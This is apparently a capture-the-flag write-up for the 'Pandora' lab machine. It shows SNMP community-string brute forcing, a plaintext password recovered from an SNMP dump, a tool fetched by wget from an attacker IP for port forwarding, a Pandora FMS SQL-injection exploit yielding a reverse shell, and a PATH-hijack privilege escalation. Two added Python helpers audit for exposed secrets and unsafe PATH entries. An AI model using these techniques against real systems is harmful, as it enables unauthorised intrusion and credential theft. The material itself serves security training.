Information Gathering
Rustscan
Rustscan finds SSH and HTTP running on TCP:
Nmap UDP
UDP scan discovers SNMP running on UDP port 161:
Enumeration on TCP
HTTP - TCP 80
The website shows the domain name panda.htb, which I add to /etc/hosts:
Both directory brute-forcing and subdomain brute-forcing turn up nothing useful, so I will move on to UDP from here.
Enumeration on UDP
SNMP - UDP 161
In SNMP (Simple Network Management Protocol), a community string is essentially a password or a key that acts as a form of authentication between an SNMP manager (or client) and an SNMP agent (or server).
Using hydra, I will first try brute-forcing the community string:
hydra -P /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt 10.10.11.136 snmp
hydra successfully discovers the community string: public
In SNMP (Simple Network Management Protocol), MIB stands for Management Information Base. It’s a virtual database that contains a hierarchical structure of managed objects. These objects represent various aspects of the managed network devices, such as hardware, software, configuration settings, performance metrics, and more.
Below are some well-known MIB OIDs that are useful to query over SNMP:
For instance, I can query the running programs like so:
snmpwalk -c public -v1 10.10.11.136 1.3.6.1.2.1.25.4.2.1.2
I can also query the system description like so:
snmpwalk -c public -v1 10.10.11.136 1.3.6.1.2.1.1.1
Shell as daniel
snmpbulkwalk
Dumping the entire SNMP tree using snmpwalk -v 2c -c public 10.10.11.136 takes too long, so I will move on to a faster way of dumping using snmpbulkwalk.
I will first install the relevant package using sudo apt install snmp-mibs-downloader.
Once installed, I will open /etc/snmp/snmp.conf and comment out the ‘mibs’ line as such:
Now with snmpbulkwalk ready, I will dump the entire SNMP tree and save it to a text file:
snmpbulkwalk -c public -v2c 10.10.11.136 > snmp-full-bulk
The dump is 6920 lines long, and after spending some time analysing it, it reveals the plaintext password for user daniel: HotelBabylon23
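Added here as an audit helper, not part of the original writeup: a parser for snmpwalk/snmpbulkwalk output that joins the hrSWRunName and hrSWRunParameters rows by PID and flags process command lines carrying credential-looking arguments, which is how a password surfaces in a dump like the one above. The sample lines and their values are constructed, and the secret pattern is a heuristic (it deliberately skips "-p <number>" so sshd-style port flags are not reported).

```python
import re

# HOST-RESOURCES-MIB hrSWRunTable columns, as numeric OIDs and as MIB-resolved names.
NAME_COL = ("1.3.6.1.2.1.25.4.2.1.2", "hrSWRunName")
PARAM_COL = ("1.3.6.1.2.1.25.4.2.1.5", "hrSWRunParameters")

# One snmpwalk/snmpbulkwalk output line:  <oid>.<index> = TYPE: "<value>"   or   <oid>.<index> = ""
LINE_RE = re.compile(r'^(?P<oid>\S+?)\.(?P<idx>\d+) = (?:(?P<type>[A-Za-z-]+): ?)?"?(?P<val>.*?)"?\s*$')
# Heuristic for secrets passed on a command line; "-p <number>" is skipped as a likely port.
SECRET_RE = re.compile(r'(?i)(?:^|\s)(?:-p\s*(?!\d+(?:\s|$))\S+|--password[=\s]+\S+|\w*(?:password|passwd|pwd)=\S+)')

def _column(oid):
    """Map an OID prefix (numeric, 'iso.'-prefixed or MODULE::name) to the table column."""
    oid = oid.split("::")[-1].lstrip(".")
    if oid.startswith("iso."):
        oid = "1." + oid[4:]
    if oid in NAME_COL:
        return "name"
    if oid in PARAM_COL:
        return "params"
    return None

def parse_processes(dump_text):
    """Join hrSWRunName and hrSWRunParameters rows by process index (the PID)."""
    procs = {}
    for line in dump_text.splitlines():
        m = LINE_RE.match(line.strip())
        col = _column(m["oid"]) if m else None
        if col:
            procs.setdefault(int(m["idx"]), {"name": "", "params": ""})[col] = m["val"]
    return procs

def find_exposed_secrets(dump_text):
    """Return (pid, name, params) for every process whose arguments look like a credential."""
    return [(pid, p["name"], p["params"])
            for pid, p in sorted(parse_processes(dump_text).items())
            if SECRET_RE.search(p["params"])]

# Constructed sample in both output styles; the values are made up, not the real dump.
SAMPLE_DUMP = """\
iso.3.6.1.2.1.25.4.2.1.2.1 = STRING: "systemd"
iso.3.6.1.2.1.25.4.2.1.2.876 = STRING: "host_check"
iso.3.6.1.2.1.25.4.2.1.2.900 = STRING: "sshd"
iso.3.6.1.2.1.25.4.2.1.5.1 = STRING: "--system"
iso.3.6.1.2.1.25.4.2.1.5.876 = STRING: "-u daniel -p Example!Pass1"
iso.3.6.1.2.1.25.4.2.1.5.900 = STRING: "-D -p 22"
HOST-RESOURCES-MIB::hrSWRunName.951 = STRING: "backup_agent"
HOST-RESOURCES-MIB::hrSWRunParameters.951 = STRING: "--config /etc/agent.conf --password hunter2"
"""
```

Running find_exposed_secrets over a real dump file (open(...).read()) reports the two constructed offenders here, pids 876 and 951, while sshd's "-p 22" is left alone.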
Now using the credentials above, I have an SSH connection as daniel:
Privesc: daniel to matt
Local Enumeration
Taking a look at /etc/passwd, there is a user matt on the system:
cat /etc/passwd | grep /bin/bash
Since user.txt is located in matt’s home folder without read access for daniel, privilege escalation should be done towards user matt.
I do see an interesting SUID file called /usr/bin/pandora_backup, but it is owned by user matt, so I would first have to escalate my privileges to matt.
In /etc/apache2/sites-enabled, I see a pandora.conf file, which implies there’s another website running internally:
It seems like pandora.panda.htb is running locally on port 80:
I can confirm this through the netstat -ntlp command, seeing that port 80 is open internally:
In /var/www/pandora, I can access the files for the internal website:
Port Forwarding
To access the website through a web browser, I will port forward the internal port 80 to my local side using chisel.
I will first download chisel to the pandora server using wget http://10.10.14.14:8000/chisel_linux.
Now with the chisel server running locally on my Kali machine, I will start the client session on the pandora server:
I get an incoming connection on the chisel server running on my Kali machine:
Now I can access the internal website on my Kali web browser:
SQLi to RCE
At the bottom of the website, the version of Pandora FMS is revealed:
This version is vulnerable to remote code execution and SQL injection, but the RCE requires user credentials, so my only option left is SQLi.
Using this GitHub source, I can spawn a shell as user matt:
sudo python sql.py -t 127.0.0.1 -f rev.php
Since the shell is very restricted, I will spawn another reverse shell through this shell connection by running the following command towards my netcat listener on the Kali machine:
Now I have a shell as matt:
SSH Persistence
Since the reverse shell connection is not stable, I will make my access as matt more robust by creating an SSH key pair.
Following this guide, I will create an SSH private and public key in matt’s home directory:
Now using the private key, I can SSH in as user matt:
ssh -i mykey matt@10.10.11.136
Privesc: matt to root
SUID
Remembering the interesting SUID file found earlier, I will take a look at /usr/bin/pandora_backup:
Root owns this file, but group matt can run it as root.
Running the file, I can see that a backup is being made to some endpoint:
It seems like all the files in /var/www/pandora/pandora_console are being backed up:
I can take a rough look at it through cat, and it seems like tar is being used to make a backup to /root/.backup:
I can take a better look at it using ltrace:
ltrace /usr/bin/pandora_backup
Because no path is given for tar, the program uses the current user’s PATH environment variable to look for a matching executable. But I control that PATH, which makes this likely vulnerable to path hijacking.
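To make the PATH lookup above concrete from the defender's side, here is an added audit snippet (not from the original writeup): it resolves a bare command name the way execvp does and flags PATH entries an unprivileged caller could write to, which is exactly the condition a SUID program that inherits PATH must not tolerate. The directories and the fake tar are constructed in a temp dir.

```python
import os
import stat
import tempfile

def resolve_like_shell(command, path_env):
    """Walk PATH left to right the way execvp/sh do and return the first executable
    named `command`, or None; an empty PATH entry means the current directory."""
    for entry in path_env.split(":"):
        candidate = os.path.join(entry or ".", command)
        if os.path.isfile(candidate) and os.access(candidate, os.X_OK):
            return candidate
    return None

def untrusted_path_entries(path_env, trusted_uids=(0,)):
    """Return (entry, reason) for PATH entries an unprivileged caller could plant a
    binary in: relative/empty entries, world-writable directories, or directories
    not owned by a trusted uid (root by default). A privileged program that inherits
    such a PATH and runs a bare command name is exposed to exactly this hijack."""
    findings = []
    for entry in path_env.split(":"):
        if not os.path.isabs(entry):
            findings.append((entry or "(empty)", "relative entry"))
            continue
        try:
            st = os.stat(entry)
        except FileNotFoundError:
            continue  # a missing directory cannot be written to (yet)
        if st.st_mode & stat.S_IWOTH:
            findings.append((entry, "world-writable"))
        elif st.st_uid not in trusted_uids:
            findings.append((entry, f"owned by uid {st.st_uid}"))
    return findings

def demo():
    """Constructed scenario: a world-writable directory prepended to PATH, as in the
    writeup, with a 'tar' in both it and a properly owned system-like directory."""
    base = tempfile.mkdtemp()
    shm, sys_bin = os.path.join(base, "shm"), os.path.join(base, "usr_bin")
    for d, mode in ((shm, 0o1777), (sys_bin, 0o755)):  # like /dev/shm and /usr/bin
        os.mkdir(d)
        os.chmod(d, mode)
        with open(os.path.join(d, "tar"), "w") as f:
            f.write("#!/bin/sh\nexit 0\n")
        os.chmod(os.path.join(d, "tar"), 0o755)
    path_env = f"{shm}:{sys_bin}"
    hijacked = resolve_like_shell("tar", path_env) == os.path.join(shm, "tar")
    findings = untrusted_path_entries(path_env, trusted_uids=(os.getuid(),))
    return hijacked, findings
```

On a live host, untrusted_path_entries(os.environ["PATH"]) is the check to run against the environment a privileged helper will inherit; any finding means the helper must call tar by absolute path or reset PATH itself.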
I’ll work from /dev/shm, and add that to the current user’s PATH:
Now the first place it will look for tar is /dev/shm.
I will create a simple tar script that runs bash as root, like so:
Running pandora_backup will spawn a shell as root: